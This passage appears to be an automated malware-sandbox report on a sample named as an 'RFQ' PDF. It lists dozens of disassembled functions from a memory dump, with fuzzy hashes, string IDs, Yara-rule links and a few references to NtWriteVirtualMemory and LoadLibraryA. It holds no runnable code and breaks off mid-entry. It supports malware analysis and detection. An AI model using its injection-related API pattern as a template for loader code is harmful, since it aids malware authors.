                              • Opcode Fuzzy Hash: d4e815ac1db29d71e76729eb811c7bce3b40173516b1b11d436e9289fa53904c
                              • Instruction Fuzzy Hash: 4152FF72604349DFDB759F29CD847DABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B776E, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 639COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 10d46c5460764ed031d88e22376875577556e7ce722067b4b108026e30e5315e
                              • Instruction ID: e98c7d1b7061b23ec132f24f5de77c22fcd32273084e3ae30d0261b148a0bd04
                              • Opcode Fuzzy Hash: 10d46c5460764ed031d88e22376875577556e7ce722067b4b108026e30e5315e
                              • Instruction Fuzzy Hash: EA52FF72604349DFDB759F29CD847EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B775D, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 637COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 59daa4c1160af637d43f68965e5a7c1de4ed25d301bae413198ec36bc21821fe
                              • Instruction ID: affb7b887dd532bcf0ab035eaba43d115d661f460ba3be63eca3e67cb8f29a8a
                              • Opcode Fuzzy Hash: 59daa4c1160af637d43f68965e5a7c1de4ed25d301bae413198ec36bc21821fe
                              • Instruction Fuzzy Hash: E752FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B220C3349A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B76B9, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 631COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: a22be75f5e903d4bcd45b788f08ff155264a3ab397e726fa2fad3453e5f60250
                              • Instruction ID: 7f7514fb44a7b84960967cee125a6704ed3b894e2530dcdd46dadf0a6940f0da
                              • Opcode Fuzzy Hash: a22be75f5e903d4bcd45b788f08ff155264a3ab397e726fa2fad3453e5f60250
                              • Instruction Fuzzy Hash: E942FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B76C5, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 631COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: de047268d76dfe4a18cd0d3ddf8e6e856a9a8eeabfbebf9da60ca44999a6286c
                              • Instruction ID: aa98e468e030da426a8982dd1d6b184c1080d363e0a3e799f1766ffc4858fc3e
                              • Opcode Fuzzy Hash: de047268d76dfe4a18cd0d3ddf8e6e856a9a8eeabfbebf9da60ca44999a6286c
                              • Instruction Fuzzy Hash: 5942FFB2604349DFDB759F29CD847EABBB6FF95300F55811ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7739, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 628COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 8a9704224b55ed0915b6c060a8a32f88d1ff28e7c7dad1b680c4667579cf89dd
                              • Instruction ID: 5e273ab4ef3db36c48fb9c0782385f05ab4d6cbdf1ff694b29b7f20b059a72bf
                              • Opcode Fuzzy Hash: 8a9704224b55ed0915b6c060a8a32f88d1ff28e7c7dad1b680c4667579cf89dd
                              • Instruction Fuzzy Hash: 5842FEB2604349DFDB759F29CD847DABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B76D1, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 627COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 251e599034773090667877d29feaa169d4ca6ae67dc6d1f7097c0c738e51a8c8
                              • Instruction ID: 3f8338a0adc475a24e1558f245d09396b1eb60795053c7aab319ce6dda52f6c3
                              • Opcode Fuzzy Hash: 251e599034773090667877d29feaa169d4ca6ae67dc6d1f7097c0c738e51a8c8
                              • Instruction Fuzzy Hash: A442EFB2604349DFDB759F29CD847DABBB6FF95300F55811ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7745, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 626COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 326dc0a2e3234b7328c69359d9df4509625b537d8dba2c65d1e677c24308fb0e
                              • Instruction ID: 3e967d91050bd4d99ad317699adf5d7c7810749433eeba1df4cc08d64bf15eb3
                              • Opcode Fuzzy Hash: 326dc0a2e3234b7328c69359d9df4509625b537d8dba2c65d1e677c24308fb0e
                              • Instruction Fuzzy Hash: 8642FF72604349DFDB759F29CD847DABBB6FF95300F55811ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7751, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 624COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: a4d7dd72627f585bfbc843601f8da2f0a88a668cc42cfdcd5007bc7cf9b49d8a
                              • Instruction ID: 7466f052e9a40df82403e3d4d3279324b701b6444ea4d7b7a3a4dd7121c1eb04
                              • Opcode Fuzzy Hash: a4d7dd72627f585bfbc843601f8da2f0a88a668cc42cfdcd5007bc7cf9b49d8a
                              • Instruction Fuzzy Hash: 5442FF72604349DFDB759F29CD847DABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B782D, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 611librarynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: d44fea8b8a5bbb209815047e21377be6aa64ebd40c3969f1343021837f58c9cc
                              • Instruction ID: a3e70fa1cf2196452bc86d78278eb959b0cf6260f5026e3080e8df718072f343
                              • Opcode Fuzzy Hash: d44fea8b8a5bbb209815047e21377be6aa64ebd40c3969f1343021837f58c9cc
                              • Instruction Fuzzy Hash: F442ED72604349DFDB759F29CD847EABBB6FF95300F55812ADC899B224C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7880, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 576nativeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 020BBAE2: LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryVirtualWrite
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 3569954152-2585089168
                              • Opcode ID: 42b1fa751e27f942a0ff906ed32a6ea2957fe3402f0911c49232d351e418ad01
                              • Instruction ID: e70415d2fc1c5b6c46230101f36a449acbc8ed4e2e353832062d9039aefbad1e
                              • Opcode Fuzzy Hash: 42b1fa751e27f942a0ff906ed32a6ea2957fe3402f0911c49232d351e418ad01
                              • Instruction Fuzzy Hash: E342D972604349DFDB759F29CD947EABBB6FF95300F55852ADC899B220C3308A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7899, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 560COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 04b445c150279eb946ea56d37d584941c8c886b97c2aad182a0312cc8f628bac
                              • Instruction ID: db75c15810d574c7789b42c293c6cfd1442d9682f55a5726e1ee8fe3f95b50cc
                              • Opcode Fuzzy Hash: 04b445c150279eb946ea56d37d584941c8c886b97c2aad182a0312cc8f628bac
                              • Instruction Fuzzy Hash: B232EB72604349DFDB759F29CD947EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7915, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 558COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 320ec76dbaa1589e94d3b4ae643061eadb0899d3c8826af8e76ed3586a1a890f
                              • Instruction ID: 75b5a445b796cb0a9b1a07e11bab7beea85e33b6413268a76229043ea4d01c1f
                              • Opcode Fuzzy Hash: 320ec76dbaa1589e94d3b4ae643061eadb0899d3c8826af8e76ed3586a1a890f
                              • Instruction Fuzzy Hash: E832EB72604349DFDB759F29CD947EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B78A5, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 556COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: db2297e483ecf442e3dd4f7da3a06845e8fb996eff0829bf8ca042e98fbfd477
                              • Instruction ID: adc8b9c937b012436194e015fe49c201109734a0d21806ad7e5422f641cc0416
                              • Opcode Fuzzy Hash: db2297e483ecf442e3dd4f7da3a06845e8fb996eff0829bf8ca042e98fbfd477
                              • Instruction Fuzzy Hash: C532DB72604349DFDB759F29CD947EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7991, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 556COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 3ad8162c49da91c18491e85ac2f88d8438c891d82dca39663c6292b855992208
                              • Instruction ID: 76ce870bcefbb1123e9ad1389b3cd33b280d5453302a149ecdb47a81cca7b414
                              • Opcode Fuzzy Hash: 3ad8162c49da91c18491e85ac2f88d8438c891d82dca39663c6292b855992208
                              • Instruction Fuzzy Hash: 1A32EC72604349DFDB759F29CD947EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7921, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 554COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: a49159e495e621a3cadf1f7bc0f42e997aadbe8e49f3908c527c3c873aa05fb7
                              • Instruction ID: d50b4892309675264e3b400512ec3bc9e51b6dac9f6f6da9174033cfd43cec9f
                              • Opcode Fuzzy Hash: a49159e495e621a3cadf1f7bc0f42e997aadbe8e49f3908c527c3c873aa05fb7
                              • Instruction Fuzzy Hash: E032DB72604349DFDB759F29CD947EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B792D, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 553COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 871d91f0dc770cd47c94cdf7fd1c94e9c68f2dd9c49bf1154c4ade3ae2e3db19
                              • Instruction ID: c44cd4c510cfb85d3e78b3b5591326181c378b1184f64064d70e51d028e2703a
                              • Opcode Fuzzy Hash: 871d91f0dc770cd47c94cdf7fd1c94e9c68f2dd9c49bf1154c4ade3ae2e3db19
                              • Instruction Fuzzy Hash: D232ED72604349DFDB759F28CC957EABBB6FF95300F55812ACC899B220C3308A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B799D, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 552COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 59868ea019507b0d82b80b415f9d84338218eb3dfc1ba9109e98acd7d725dfbd
                              • Instruction ID: c162350f88b2c9ab0f57342e8f0e4cad40ea00ca5ab9ea2a07d38ba550643579
                              • Opcode Fuzzy Hash: 59868ea019507b0d82b80b415f9d84338218eb3dfc1ba9109e98acd7d725dfbd
                              • Instruction Fuzzy Hash: 6A32DB72604349DFDB759F29CD947EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7A12, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 51c3f1fe9ec101e73e067e3221c3c2908c43e5693fa25b1d87965861cc18da7f
                              • Instruction ID: e3d9b31455924dd595a41276d5abbf83324655d9a568bcd94598af37550409dd
                              • Opcode Fuzzy Hash: 51c3f1fe9ec101e73e067e3221c3c2908c43e5693fa25b1d87965861cc18da7f
                              • Instruction Fuzzy Hash: 7932DB72604349DFDB759F29CD947EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B79A9, Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 550COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: d90752b4afac1c6599076395c22a4a4efe381e275bf593e284efea7d504ecec2
                              • Instruction ID: e80d609159a5342a800cfc02b13985404c9fbd6f7cb896a4086acc304e2d8f46
                              • Opcode Fuzzy Hash: d90752b4afac1c6599076395c22a4a4efe381e275bf593e284efea7d504ecec2
                              • Instruction Fuzzy Hash: 3A32FC72604349DFDB759F28CC957EABBB6FF95300F55812ADC899B220C3308A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7A89, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 535COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: ead3ed15697538e130d8ddbdb42dbafc79c7c45b9b00fa184d1d623ace3b1faf
                              • Instruction ID: c8a45b92f900cbe6ba9b9a3899965e2c3636b4a098e981f1006136de5ae42b6a
                              • Opcode Fuzzy Hash: ead3ed15697538e130d8ddbdb42dbafc79c7c45b9b00fa184d1d623ace3b1faf
                              • Instruction Fuzzy Hash: 6432EA72604349DFDB759F28CD857EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7A7D, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 518COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: DHcL$i"m$k,I5
                              • API String ID: 0-2585089168
                              • Opcode ID: 20762debe609168c09c34abdc1d61a763de647022905b6a4160292319607065c
                              • Instruction ID: 55ab4abf2b3f5eba406ce09ce66cb9c079b521958a3df8cfeb15160b3bbc87dc
                              • Opcode Fuzzy Hash: 20762debe609168c09c34abdc1d61a763de647022905b6a4160292319607065c
                              • Instruction Fuzzy Hash: 8A22EC72604349DFDB759F29CD857EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7A71, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 507COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: 268d01afd346390ab956b8de7c45e949df8c1c60722b9a4dd10c7236b7350039
                              • Instruction ID: 3b675b11fd72e7b9a923cfc0586ff759fe2f10e37bbcbacb71d0655f3198cf9f
                              • Opcode Fuzzy Hash: 268d01afd346390ab956b8de7c45e949df8c1c60722b9a4dd10c7236b7350039
                              • Instruction Fuzzy Hash: D222ECB2604349DFDB759F29CD857DABBB6FF95300F15812ACC899B220C3349A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7B65, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 506nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: i"m$k,I5
                              • API String ID: 3527976591-782811531
                              • Opcode ID: a7ba01922db93fe0f06bea7aa2bf511095d9252508641633a7f8166b3a7533ba
                              • Instruction ID: a5779ca951bc6296293442f6229afb252bc271228bc77da4372e9b9f3ac89457
                              • Opcode Fuzzy Hash: a7ba01922db93fe0f06bea7aa2bf511095d9252508641633a7f8166b3a7533ba
                              • Instruction Fuzzy Hash: D822DCB2604349DFDB759F29CD857EABBB6FF95300F458129CC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7AED, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 505COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: 38f80fdf61b77cd353ca2c5d70b39993d26ea5edce61b40a93fa9331b1937fe4
                              • Instruction ID: 48879c4d5bc5bb42b40730349809634e6ae57fb71969902a8d17588d24548c69
                              • Opcode Fuzzy Hash: 38f80fdf61b77cd353ca2c5d70b39993d26ea5edce61b40a93fa9331b1937fe4
                              • Instruction Fuzzy Hash: C222ECB2504349DFDB759F29CD857DABBB6FF95300F55812ACC899B220C3349A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7BE1, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 485nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: i"m$k,I5
                              • API String ID: 3527976591-782811531
                              • Opcode ID: 21d407e409e18187d6ca4ab1f006826d3b92a3d2058a110c641bed9055c5577c
                              • Instruction ID: bac67bfb000ab5cf459e67ab14f08805eec39ef6501f1b473592fa12b54d6ee3
                              • Opcode Fuzzy Hash: 21d407e409e18187d6ca4ab1f006826d3b92a3d2058a110c641bed9055c5577c
                              • Instruction Fuzzy Hash: 4222DAB2604349DFDB759F29CD857DABBB6FF95300F55812ACC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7B4D, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 476COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: 9aa721b930cfca1bb07ffd1d75bafbc4c9e816dff4fadc5e633fb4ba4a147846
                              • Instruction ID: d3f43548725d45cdc919d626a339b11ed9d4167c10a37f65d0dc4965df37484c
                              • Opcode Fuzzy Hash: 9aa721b930cfca1bb07ffd1d75bafbc4c9e816dff4fadc5e633fb4ba4a147846
                              • Instruction Fuzzy Hash: 8E22DA72504349DFDB759F29CD857EABBB6FF95300F55812ADC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7BC9, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 474COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: 6e548f8f1663abb9dad86c0a0f1874856e11aa5f83aaaacc78c4e4b077de0386
                              • Instruction ID: fc0d6e79158676fcba4a98f25f78f0189233b425bb182439e12e5a198948a856
                              • Opcode Fuzzy Hash: 6e548f8f1663abb9dad86c0a0f1874856e11aa5f83aaaacc78c4e4b077de0386
                              • Instruction Fuzzy Hash: 5D22EAB2504349DFDB759F29CD857EABBB6FF95300F55812ADC898B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7B59, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 472COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              • Opcode ID: 014fde0b87edca0f6fcbcd48538f10002fb140991831405030ca143485ed8247
                              • Instruction ID: 377992ac899f086f92b980b023383fbb82cb66fe4aba704c681c8d02179413cb
                              • Opcode Fuzzy Hash: 014fde0b87edca0f6fcbcd48538f10002fb140991831405030ca143485ed8247
                              • Instruction Fuzzy Hash: CE22DAB2604349DFDB759F29CD857EABBB6FF95300F558129DC899B220C3309A81DB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7BD5, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 469COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
